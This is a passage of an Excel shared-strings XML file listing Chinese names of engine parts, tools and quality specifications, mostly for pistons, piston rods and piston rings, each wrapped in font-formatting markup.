      </rPr>
      <t>换向连杆检验说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向连杆首次生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向系统铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>黄铜板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>黄铜板，合金</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灰铁铸件修补</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回滑座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回气室焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转灯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转滑阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转马达</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转轴吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转轴密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绘图工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>混凝土基础</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>混频部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活动杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞磅压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞弹簧板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞导环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞底部插管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞吊钩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞吊装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞定距块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞法兰机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆导环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆底座吊装工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆地脚吊装工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆吊装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆刮环清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆和填料函盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆火焰淬火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆螺母盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆螺栓用吊环螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆填料函</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-K90GF</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆支撑工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆工具板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和连杆安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和连杆拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和连杆用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和气缸套拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞滑环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环封装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环更新套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环扩张器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环扩张器爪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环磨合层质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环陶瓷涂层质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环选择表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制造规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环质量标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环组</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞及活塞杆工具板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞及活塞杆支架</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞卡板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Y56</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞控制总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Y56</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却油铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞起吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞清洁环布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞清洁环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>更新</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞裙拆除顶螺丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞式蓄能器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头，半成品</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头和活塞裙</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头活塞销装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头起吊工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞下部，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞销衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞悬浮试验规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞悬挂链条</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞压力测试工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞支架</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞支铁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞质量检验</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>火花塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>火焰防护装置轮毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>火焰环拆卸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
